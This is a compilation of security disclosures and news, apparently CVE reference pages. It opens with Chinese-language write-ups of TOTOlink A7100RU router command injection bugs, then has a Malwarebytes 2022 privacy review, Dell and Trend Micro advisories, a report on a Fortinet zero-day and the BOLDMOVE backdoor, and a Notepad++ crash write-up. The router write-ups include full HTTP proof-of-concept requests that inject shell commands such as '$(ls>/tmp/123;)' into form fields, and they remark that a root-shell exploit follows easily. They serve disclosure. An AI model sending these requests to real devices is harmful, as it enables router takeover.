TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the dayvalid parameter in the setting/delStaticDhcpRules function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取dayvalid参数中的内容传递给v9，之后带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"dayvalid":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48122: ttt/17 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the servername parameter in the setting/delStaticDhcpRules function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取servername参数下的内容传递给v7，之后将v7带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"servername":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48123: ttt/15 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the FileName parameter in the setting/setOpenVpnCertGenerationCfg function.

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"FileName":"1$(ls>/tmp/123;)"}

CVE-2022-48124: ttt/14 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the password parameter in the setting/setOpenVpnCertGenerationCfg function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取password参数下的内容传递给v26，之后将v26传递给v28，最后将v28带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"password":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48125: ttt/13 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the username parameter in the setting/setOpenVpnCertGenerationCfg function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取username参数中的内容传递给v51，之后将v51带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"username":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48126: ttt/12 at main · Am1ngl/ttt

In 2022, privacy was upended for millions of people. Here are the biggest stories from last year. 



(Read more...)




The post What happened in privacy in 2022 appeared first on Malwarebytes Labs.

Annual reviews of any year’s developments in privacy rarely lend themselves to pithy wrap-ups, but 2022 was different, providing the clearest example yet for so many people—American women in particular—that their privacy was not theirs to determine, and that the often-repeated refrain that privacy doesn’t matter for those who have “nothing to hide” only holds sway until the world around those words decides: “Now you do_._”

The US Supreme Court’s decision to overturn _Roe v. Wade_ and the associated Constitutional right to choose to have an abortion redefined personal privacy, as individual states can now treat previously benign health data as possible evidence in a criminal investigation. Where perhaps millions of women previously had “nothing to hide,” now, they do.

The Supreme Court’s decision was also an event that has few modern equivalents, changing the behaviors of three, core parts of society—government, corporate, and public.

In the wake of a leaked draft of the decision, Federal legislators introduced a new, targeted data privacy bill to protect reproductive health data. Immediately following the decision, countless individuals dropped their current period-tracking apps in search for another app that would promise to better protect their data. And months after the decision, companies are still announcing changes to what types of data they will no longer store.

In looking back at 2022, it isn’t that nothing else happened in data privacy—it’s that nothing else like this has happened for a long time.

Here’s a look at what happened in privacy in 2022.

****Roe v. Wade overturned****

The privacy fallout from the US Supreme Court’s decision in _Dobbs v. Jackson Women’s Health Organization_ is both succinct and enormous: It changed what people want to keep private. 

By allowing a state-by-state approach to the legality of obtaining and providing abortion services, the US Supreme Court’s decision introduced a new uncertainty about what types of online activity—be it Google searches, Facebook posts, TikTok videos, or location histories revealing trips to an abortion clinic—could now be considered as potential evidence of a crime.

Would law enforcement, for example, be able to pull Google search requests on someone they suspected of seeking an abortion? Would text messages between friends be brought before an investigator? What about Instagram stories that included offers to pay for the travel and lodging of complete strangers seeking abortion from other states? And what about period-tracking app data? What if cops could see in a person’s data that, for a week or two, they were pregnant, and then soon after, they were not? 

In the absence of immediate best practices, individuals made their own choices. Period-tracking app users scrambled to find the most secure app online, and one period-tracking app maker promised to encrypt user data so that, even if law enforcement made a request for their data, the data would be unintelligible. (Those promises, one investigation found, were shaky.)

But it wasn’t just period-tracking apps that reconsidered data collection and storage policies.

In July, Google announced that it would automatically delete location histories that revealed physical trips to any sensitive locations, which Google defined as “medical facilities like counseling centers, domestic violence shelters, abortion clinics, fertility centers, addiction treatment facilities, weight loss clinics, \[and\] cosmetic surgery clinics.” Samsung, too, recently announced that it would delete “Women’s health data” collected through Samsung Health.

To address this corporate, piecemeal approach to user privacy, Congressmembers introduced the My Body, My Data Act, which would place new, national restrictions on how companies handle reproductive health data.

****Web wins (and one wayward rollout)****

When the developers of the privacy-forward browser Brave released their own search engine last year, they touted that, unlike other search engines, “Brave Search” would pull from an entirely separate index of the Internet, only relying on Google’s index when it could not fill in the gaps for user searches. Upon Brave Search’s launch, this “independence score,” as the company put it, was 87 percent.

One year later, that score has reportedly increased to 92 percent for all Brave Search users, and Brave Search itself has exited out of beta. But perhaps the biggest privacy draw of all for the tool is simple: It doesn’t track users or their searches.

Privacy-minded users has another choice in web browsers last year, as well, as Mozilla claimed that a new feature in Firefox made it the “most private and secure major browser available across Windows, Mac, and Linux.”

The feature, called Total Cookie Protection, promises to create “cookie jars” for every website that users visit. This will reportedly put browsing activity into separate silos so that user activity cannot be stitched together across websites, which is often done to help build in-depth profiles of who to target with ads.

But why spend so much time on cookie restrictions when, according to Google’s own words several years ago, it, too, would retire third-party tracking in its browser, Chrome?

Probably because that major rollout was delayed yet again—this time to 2024.

****A question of corporate commitment to privacy****

If you can believe it, there was a time last year when the biggest thing happening to Twitter had nothing to do with its new owner, Elon Musk.

In August, the company confirmed a data breach that affected 5.4 million users, their email addresses and phone numbers now linked to their accounts in a data dump that could be found for sale on the dark web.

In May, Twitter was also hit with a $150 million fine from the US Federal Trade Commission for violating an earlier consent order that prohibited the company from “misleading consumers about the extent to which it protects the security, privacy, and confidentiality of nonpublic consumer information, including the measures it takes to prevent unauthorized access to nonpublic information and honor the privacy choices made by consumers.”

But with so broad a description, what, exactly, did Twitter do?

It used phone numbers that were specifically requested for two-factor authentication—a security measure—for targeted advertising.

(At least the company did put its services on Tor last year, a great step for familiarizing users with a more private online experience.)

_To learn more about privacy and Tor’s security benefits to the Internet, listen to our Lock and Code podcast interview with Alec Muffet here._

But privacy blunders—and intentional evasions—have become a guarantee in Silicon Valley, and so Twitter shouldn’t receive all the spotlight.

Facebook, possibly angered by one browser’s decision to remove tracking parameters that Facebook inserted into URLs to help track users across pages, decided to encrypt their URLs so that the browser in question could no longer determine which part of the URL would need to be removed. The company is also facing a lawsuit alleging that it has built a “secret workaround” to safeguards built into the iPhone to prevent the social media giant from tracking users.         

Finally, Google settled multi-state charges that the company had allegedly misled users as to how their locations were tracked across various services, agreeing to pay a whopping $391.5 million. A separate but similar lawsuit is still active against the company.

****Legislation and legal violation****

Compared to earlier years, the legislative battle for data privacy cooled off in 2022, but that doesn’t mean it was necessarily less spirited.

In June, a draft of the US Supreme Court’s opinion in _Dobbs v. Jackson Women’s Health Organization_ was leaked, suggesting that the Court was positioned to soon overturn both _Roe v. Wade_ and _Planned Parenthood v. Casey_, previous decisions that had guaranteed a Constitutional right to choose to have an abortion. 

Before the Supreme Court could issue its final decision, legislators in Washington DC moved fast, introducing the My Body, My Data Act in both the House of Representatives and the Senate. The bill sought to place new restrictions on how companies use “personal reproductive or sexual health information,” allowing for the collection, use, retainment, and disclosure of such data only if a company was delivering a service requested by a user, or if the user gave express consent. The definition of “personal reproductive or sexual health information” in the bill is broad, including any info that could reveal someone’s attempts to “research or obtain” reproductive health service, along with any reproductive or sexual health “conditions,” including pregnancy or menstruation.

The bill has not significantly moved forward since its introduction.

Separately, last year saw the introduction of the American Data and Privacy Protection Act—the latest attempt from Congressmembers to pass a Federal, comprehensive data privacy law for the United States. Like many attempts before, the American Data and Privacy Protection Act would extend the rights to access, correct, and request deletion of the personal data that companies have already collected on them—similar to the rights granted to those living in the European Union through the General Data Protection Regulation (GDPR).

With a new Congress elected, it is unclear whether the bill will progress.

Aside from legislation that has only been introduced, one full-blown law scored its first-ever enforcement action. In California, the state’s attorney general announced a settlement with the makeup company Sephora over allegations that it violated the California Consumer Privacy Act, the state’s privacy law that was first passed in 2018.

According to the Office of the Attorney General, Sephora allegedly “failed to disclose to consumers that it was selling their personal information, … failed to process user requests to opt out of sale via user-enabled global privacy controls in violation of the CCPA, and … it did not cure these violations within the 30-day period currently allowed by the CCPA.”

Per the settlement, Sephora agreed to pay $1.2 million.

****Pushing back against stalkerware****

Rounding out a turbulent year, there was some good news in the continued fight against stalkerware.

Through a months-long investigation, the technology publication TechCrunch revealed that a network of stalkerware-type apps all shared the same security vulnerability that could allow “near-unfettered remote access” to the data of hundreds of thousands of devices that are already infected with said apps. TechCrunch worked with the Carnegie Mellon University Software Engineering Institute to both report the vulnerability and contact any party that could responsibly address the vulnerability. The investigation provided likely the strongest, global “map” of who is providing cover for these types of apps, and how they seem to skirt any consequences.

But there’s more.

Following questions that TechCrunch sent to a company called 1Byte, which operates the server infrastructure behind several of the apps under investigation, two of the apps “appeared to cease working or shut down.” 

Today, TechCrunch offers a tool that allows people to see if their devices are infected with the apps that the publication previously investigated.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

What happened in privacy in 2022

Dell EMC PV ME5, versions ME5.1.0.0.0 and ME5.1.0.1.0, contains a Client-side desync Vulnerability. An unauthenticated attacker could potentially exploit this vulnerability to force a victim's browser to desynchronize its connection with the website, typically leading to XSS and DoS.

**Artikkelin sisältö**

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-23691

Dell PV ME5 versions ME5.1.0.0.0 and ME5.1.0.1.0 contain a Client-side desync Vulnerability. An unauthenticated attacker may potentially exploit this vulnerability to force a victim's browser to desynchronize its connection with the website, typically leading to XSS and DoS. 

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-23691

Dell PV ME5 versions ME5.1.0.0.0 and ME5.1.0.1.0 contain a Client-side desync Vulnerability. An unauthenticated attacker may potentially exploit this vulnerability to force a victim's browser to desynchronize its connection with the website, typically leading to XSS and DoS. 

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Product**

**Affected Versions**

**Updated Versions**

ME5012, ME5024, and ME5084

Versions before ME5.1.1.0.5

ME5.1.1.0.5

**Product**

**Affected Versions**

**Updated Versions**

ME5012, ME5024, and ME5084

Versions before ME5.1.1.0.5

ME5.1.1.0.5

**Kiitokset**

Dell Technologies would like to thank KEN PYLE, EXPLOIT DEVELOPER & PARTNER AT CYBIR / GRADUATE PROFESSOR AT CHESTNUT HILL COLLEGE for reporting this issue.  
 

**Versiohistoria**

Revision

Date

Description

1.0

2023-01-17

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Artikkelin ominaisuudet**

**Tuote, johon asia vaikuttaa**

PowerVault MD Storage Arrays Management Pack Versions for Microsoft System Center Operations, PowerVault, MD Series, ME Series, NX Series, Tape Backup & Recovery, PowerVault MD Storage Arrays Management Pack , Dell MD Storage Array Management Pack Suite Version 5.0 For Microsoft System Center Operations, Dell MD Storage Arrays Management Pack Suite v6.0 for Microsoft System Center Operations Manager, Dell MD Storage Arrays Management Pack Suite v6.1 for Microsoft System Center Operations Manager, Dell PowerVault MD Storage Arrays Management Pack Version 4.0 for Microsoft System Center Oper Mangr, Dell PowerVault MD Storage Arrays Management Pack Version 4.1 for Microsoft System Center Oper Mngr, Dell PowerVault MD3000 with Red Hat Enterprise Linux HA Clusters, Dell PowerVault MD3000 with Windows HA Clusters, Dell PowerVault MD3000i with Windows HA Clusters, Dell PowerVault MD3200/MD3220-Windows HA Cluster, Dell PowerVault MD3200i and MD3220i with Windows HA Clusters, Dell PowerVault MD3600f/3620f Windows HA Cluster, Dell PowerVault MD3600i/3620i Windows HA Cluster, Dell EMC ML3, Dell PowerVault OEM Ready MD34XX and MD38XX, PowerVault 100T DAT72, PowerVault 100T DDS3 (Tape Drive), PowerVault 100T TR40, PowerVault 110T DLT7000 (Tape Drive), 110T DLT1 Drive, 110T DLT4000 Cartridge Tape Subsystem, PowerVault 110T LTO2-L, PowerVault 110T LTO3, PowerVault 110T VS160, PowerVault 110T DLT VS80 (Tape Drive), PowerVault 112T 1U (Tape Enclosure), PowerVault 114X Tape Rack Enclosure, PowerVault 120T DDS4 (Autoloader), PowerVault 120T DLT4000 (Autoloader), PowerVault 120T DLT7000 (Autoloader), PowerVault 122T DLT VS80 (Autoloader), PowerVault 124T, PowerVault 130T DLT (Tape Library), PowerVault 210S (SCSI), PowerVault 211S (SCSI), PowerVault 220S (SCSI), PowerVault 221S (SCSI), PowerVault 224F (Fibre Channel Expansion), PowerVault 250F (Fibre Channel), PowerVault 251F (Fibre Channel), PowerVault 35F (Fibre Channel Bridge), PowerVault 50F (Fibre Channel Switch), PowerVault 51F (8P Fibre Channel Switch), PowerVault 530F (SAN Appliance), PowerVault 56F (16P Fibre Channel Switch), PowerVault 57F, PowerVault 630F (Fibre Channel Expansion), PowerVault 650F (Fibre Channel RAID), PowerVault 651F (Fibre Channel), PowerVault 660F (Fibre Channel RAID), PowerVault 700N, PowerVault 701N (Deskside NAS Appliance), PowerVault 715N (Rackmount NAS Appliance), PowerVault 725N (Rackmount NAS Appliance), PowerVault 735N (Rackmount NAS Appliance), PowerVault 745N, PowerVault 750N (Deskside NAS Appliance), PowerVault 755N (Rackmount NAS Appliance), PowerVault 770N (Deskside NAS Appliance), PowerVault 775N (Rackmount NAS Appliance), PowerVault 720N, 740N, and 760N (Filers), PowerVault 120T DDS3 (Autoloader), Dell DL1000, PowerVault DL2000, PowerVault DL2100, PowerVault DL2200 CommVault, PowerVault DL2200, Powervault DL2300, Dell DL4000, PowerVault 120T DLT1 (Autoloader), PowerVault DP100, PowerVault DP500, PowerVault DP600, Dell DR2000v, Dell DR4100, Dell DR6000, PowerVault DX6104, PowerVault DX6112, PowerVault 100T (IDE Tape Drive), POWER VAULT 114X LTO5 140, PowerVault 110T LTO (Tape Drive), PowerVault 122T LTO (Autoloader), PowerVault 128T LTO/SDLT (Tape Library), PowerVault 132T LTO/SDLT (Tape Library), PowerVault 136T LTO/SDLT (Tape Library), PowerVault 110T LTO2 (Tape Drive), PowerVault 122T LTO2 (Autoloader), PowerVault 160T LTO2 (Tape Library), PowerVault LTO3-060, PowerVault LTO3-080, PowerVault LTO4-120HH, PowerVault LTO5-140, Powervault LTO6, PowerVault LTO7, PowerVault LTO8, PowerVault LTO9, PowerVault 200S (SCSI), PowerVault 201S (SCSI), PowerVault MD1000, PowerVault MD1120, PowerVault MD1200, PowerVault MD1220, PowerVault MD3000, PowerVault MD3000i, PowerVault MD3060e, PowerVault MD3200, PowerVault MD3200i, PowerVault MD3220, PowerVault MD3220i, PowerVault MD3260, PowerVault MD3260i, PowerVault MD3400, PowerVault MD3420, PowerVault MD3460, PowerVault MD3600f, PowerVault MD3600i, PowerVault MD3620f, PowerVault MD3620i, PowerVault MD3660f, PowerVault MD3660i, PowerVault MD3800f, PowerVault MD3800i, PowerVault MD3820f, PowerVault MD3820i, PowerVault MD3860f, PowerVault MD3860i, Dell EMC PowerVault ME4012, Dell EMC PowerVault ME4024, Dell EMC PowerVault ME4084, Dell EMC PowerVault ME412 Expansion, Dell EMC PowerVault ME424 Expansion, Dell EMC PowerVault ME484, PowerVault ME5012, PowerVault ME5024, PowerVault ME5084, PowerVault ML6000, PowerVault NF100, PowerVault NF500, PowerVault NF600, PowerVault NX1950, PowerVault NX200, PowerVault NX300, PowerVault NX3000, PowerVault NX3100, PowerVault NX3200, PowerVault NX3300, PowerVault NX3500, PowerVault NX3600, PowerVault NX3610, Powervault NX400, PowerVault RD1000, PowerVault Storage Area Network (SAN), PowerVault 110T SDLT220 (Tape Drive), PowerVault 110T SDLT320 (Tape Drive), PowerVault 122T SDLT 320 (Autoloader), PowerVault TL2000, PowerVault TL4000, Product Security Information, Dell Storage MD1280, Dell Storage MD1400, Dell Storage MD1420, Dell Storage NX3230, Dell EMC Storage NX3240, Dell Storage NX3330, Dell EMC Storage NX3340, Dell Storage NX430, Dell EMC NX440, PowerVault TL1000 ...

**Edellinen julkaisupäivä**

18 tammik. 2023

**Versio**

2

**Artikkelin tyyppi**

Dell Security Advisory

CVE-2023-23691: DSA-2023-018: Dell PowerVault ME5 Security Update for a Client Desync Attack Vulnerability

A vulnerability exists in Trend Micro Maximum Security 2022 (17.7) wherein a low-privileged user can write a known malicious executable to a specific location and in the process of removal and restoral an attacker could replace an original folder with a mount point to an arbitrary location, allowing a escalation of privileges on an affected system.

**LAST UPDATED: DEC 30, 2022**

**Release Date:** December 30, 2022

**CVE Vulnerability Identifier:** CVE-2022-48191

**Platform(s):** Microsoft Windows

**Summary**

Trend Micro has released a hotfix for Trend Micro Maximum Security 2022 which resolves a security time-of-check time-of-use local privilege escalation vulnerability.

**Affected version(s)**

PRODUCT

AFFECTED VERSION(S)

PLATFORM

LANGUAGE(S)

Trend Micro Maximum Security

2022 (v17.7)

Microsoft Windows

English

**Solution**

Trend Micro has released a hotfix available for version below that resolves the issue:

PRODUCT

AFFECTED VERSION(S)

PLATFORM

LANGUAGE(S)

Trend Micro Maximum Security

2022 (v17.7) Hotfix

Microsoft Windows

English

**Vulnerability Details**

This hotfix resolves a vulnerability in the product wherein a low-privileged user can write a known malicious executable to a specific location and in the process of removal and restoral an attacker could replace an original folder with a mount point to an arbitrary location, allowing a escalation of privileges on an affected system.

Trend Micro has received no reports nor is aware of any actual attacks against the affected products related to this vulnerability at this time.

**Mitigating Factors**

None identified. Customers are advised to ensure they always have the latest version of the program.

**Acknowledgement**

Trend Micro would like to thank **Simon Zuckerbraun** for responsibly disclosing this issue and working with Trend Micro to help protect our customers.

**Additional Assistance**

Customers who have questions are encouraged to contact Trend Micro Technical Support for further assistance.

**External Reference**

*   ZDI-CAN-18291

How helpful was this article?

*   It wasn't helpful at all.
*   Somewhat helpful.
*   Just okay.
*   It was somewhat helpful.
*   It was helpful.

*   \*Feedback submitted will only be used as reference for future product, service and article improvements.

CVE-2022-48191: Security Bulletin: Trend Micro Maximum Security Time-Of-Check Time-Of-Use Local Privilege Escalation Vulnerability

A suspected China-nexus threat actor exploited a recently patched vulnerability in Fortinet FortiOS SSL-VPN as a zero-day in attacks targeting a European government entity and a managed service provider (MSP) located in Africa.
Telemetry evidence gathered by Google-owned Mandiant indicates that the exploitation occurred as early as October 2022, at least nearly two months before fixes were

Firewall / Network Security

A suspected China-nexus threat actor exploited a recently patched vulnerability in Fortinet FortiOS SSL-VPN as a zero-day in attacks targeting a European government entity and a managed service provider (MSP) located in Africa.

Telemetry evidence gathered by Google-owned Mandiant indicates that the exploitation occurred as early as October 2022, at least nearly two months before fixes were released.

"This incident continues China's pattern of exploiting internet facing devices, specifically those used for managed security purposes (e.g., firewalls, IPS\\IDS appliances etc.)," Mandiant researchers said in a technical report.

The attacks entailed the use of a sophisticated backdoor dubbed **BOLDMOVE**, a Linux variant of which is specifically designed to run on Fortinet's FortiGate firewalls.

The intrusion vector in question relates to the exploitation of CVE-2022-42475, a heap-based buffer overflow vulnerability in FortiOS SSL-VPN that could result in unauthenticated remote code execution via specifically crafted requests.

Earlier this month, Fortinet disclosed that unknown hacking groups have capitalized on the shortcoming to target governments and other large organizations with a generic Linux implant capable of delivering additional payloads and executing commands sent by a remote server.

The latest findings from Mandiant indicate that the threat actor managed to abuse the vulnerability as a zero-day to its advantage and breach targeted networks for espionage operations.

"With BOLDMOVE, the attackers not only developed an exploit, but malware that shows an in-depth understanding of systems, services, logging, and undocumented proprietary formats," the threat intelligence firm said.

The malware, written in C, is said to have both Windows and Linux variants, with the latter capable of reading data from a file format that's proprietary to Fortinet. Metadata analysis of the Windows flavor of the backdoor show that they were compiled as far back as 2021, although no samples have been detected in the wild.

BOLDMOVE is designed to carry out a system survey and is capable of receiving commands from a command-and-control (C2) server that in turn allows attackers to perform file operations, spawn a remote shell, and relay traffic via the infected host.

An extended Linux sample of the malware comes with extra features to disable and manipulate logging features in an attempt to avoid detection, corroborating Fortinet's report.

"The exploitation of zero-day vulnerabilities in networking devices, followed by the installation of custom implants, is consistent with previous Chinese exploitation of networking devices," Mandiant noted.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Chinese Malware Spotted Exploiting Recent Fortinet Firewall Vulnerability

Buffer overflow in function Notepad_plus::addHotSpot in Notepad++ v8.4.3 and earlier allows attackers to crash the application via two crafted files.

****CVE-2022-31901****

*   Denial Of Services (DOS) in Notepad++(x86) in 8.4.3 and before.

****Description****

*   Vulnerability triggering, via opening two specially crafted text files (e.g. first.txt & second.txt) as input to notepad++.

As an illustrative example below, as of 11/07/2022, latest version of Notepad++(x86) is 8.4.3 is used. 

**Proof of Concept -**

*   Open the two example input files first.txt & second.txt in Notepad++ in any order.

**Result :**

**Visual Studio 2019 Dump Analysis**

Here we can see the problem to parse these files in **ScintallComponent -> Editor.h -> Line number 690.**

**Root Cause Analysis**

*   When notepad++ opens any file it calls a function **notepad\_plus::addHotSpot** which creates heap memory with **new** operator and stores the return address in **widetext** variable TCHAR *wideText = new TCHAR[endPos - startPos + 1];. Since it requests for large allocation, **new** returns **bad\_alloc** which is not handled in notepad++ and results in DoS.
    
*   So it can be said that, opening the two example files with Notepad++(x86) <= 8.4.3 is leading to Denial of Service.
    

**Tested Versions**

The vulnerability is tested to work on following version:

*   Notepad++ 8.3.2 32-bit
*   Notepad++ 8.3.3 32-bit.
*   Notepad++ 8.4.0 32-bit.
*   Notepad++ 8.4.1 32-bit.
*   Notepad++ 8.4.2 32-bit.
*   Notepad++ 8.4.3 32-bit.

**Tested Environment**

*   Windows 11 - 22563.1000 64 bit
*   Windows 10 - 10.0.19042.1586 64-bit
*   Windows 10 - 10.0.19044.1706 64-bit

**Update**

*   As of 05-01-2023, this issue still persists in the Notepad++ versions 8.4.8 (32-bit) and before.

Tag

#windows